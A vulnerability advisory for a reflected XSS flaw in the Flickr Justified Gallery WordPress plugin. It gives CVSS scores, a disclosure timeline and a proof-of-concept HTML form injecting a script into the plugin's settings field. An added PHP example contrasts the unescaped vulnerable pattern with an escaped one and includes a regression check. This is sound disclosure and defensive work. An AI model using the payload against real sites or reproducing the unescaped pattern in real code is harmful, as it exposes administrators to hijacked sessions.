Advisory:

Reflected XSS in Flickr Justified Gallery could allow unauthenticated attackers to do almost anything an admin can do

Vulnerability

Last revised:

This plugin contains a reflected XSS vulnerability which would allow an unauthenticated attacker to do almost anything an admin user can do.

For this to happen, the administrator would have to be tricked into clicking on a link controlled by the attacker. It is easy to make these links very convincing.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score: 5.8 Medium
Vector: Network
Complexity: Medium
Authentication: None
Confidentiality: Partial
Integrity: Partial
Availability: None
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Visit a page containing the following in Firefox or any other browser with no reflected XSS mitigation strategies, and click submit:

<form action="http://localhost/wp-admin/options-general.php?page=fjgwpp.php" method="POST">
<input type="text" name="fjgwpp_userID" value=":&quot;>&lt;script>alert(1)&lt;/script>">
<input type="text" name="Submit" value="Save Changes">
<input type="submit">
</form>

Advisory timeline

  • 2015-07-21: Discovered
  • 2015-07-22: Reported to vendor via email
  • 2015-07-22: Requested CVE
  • 2015-07-23: Vendor responded confirming fixed in 3.4.0
  • 2015-07-28: Published

Mitigation/further actions

Upgrade to version 3.4.0 or later
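
For developers maintaining similar settings pages, the following added example (not the plugin's code and not part of the original advisory) shows the pattern the proof of concept relies on, a submitted fjgwpp_userID value echoed back into an input's value attribute, next to the same field with output escaping. The function names are hypothetical; the sample input is the decoded value from the form above.

```php
<?php
// Hypothetical settings-field renderers for illustration; not the plugin's code.

// Vulnerable pattern: the submitted value is placed in the attribute unescaped.
function render_field_vulnerable(array $post): string {
    $user_id = $post['fjgwpp_userID'] ?? '';
    return '<input type="text" name="fjgwpp_userID" value="' . $user_id . '">';
}

// Hardened pattern: encode for the HTML attribute context at output time.
// Inside WordPress, esc_attr() does this job.
function render_field_escaped(array $post): string {
    $user_id = $post['fjgwpp_userID'] ?? '';
    if (!is_string($user_id)) {
        $user_id = ''; // a fjgwpp_userID[]=... submission arrives as an array
    }
    $safe = htmlspecialchars($user_id, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="fjgwpp_userID" value="' . $safe . '">';
}

// Parse the markup the way a browser would and count <script> elements.
// A correctly rendered field yields exactly one <input> and no scripts.
function count_script_elements(string $html): int {
    $previous = libxml_use_internal_errors(true); // silence parser warnings
    $doc = new DOMDocument();
    $doc->loadHTML('<html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    return $doc->getElementsByTagName('script')->length;
}

// Constructed sample inputs: a plain value and the decoded value from the form above.
$samples = [
    'benign'  => ['fjgwpp_userID' => '12345678@N00'],
    'payload' => ['fjgwpp_userID' => ':"><script>alert(1)</script>'],
];

foreach ($samples as $label => $post) {
    printf(
        "%-8s vulnerable: %d script element(s), escaped: %d script element(s)\n",
        $label,
        count_script_elements(render_field_vulnerable($post)),
        count_script_elements(render_field_escaped($post))
    );
}
```

The script-element count doubles as a regression check: run it against any field that reflects request data and fail the build if it is non-zero.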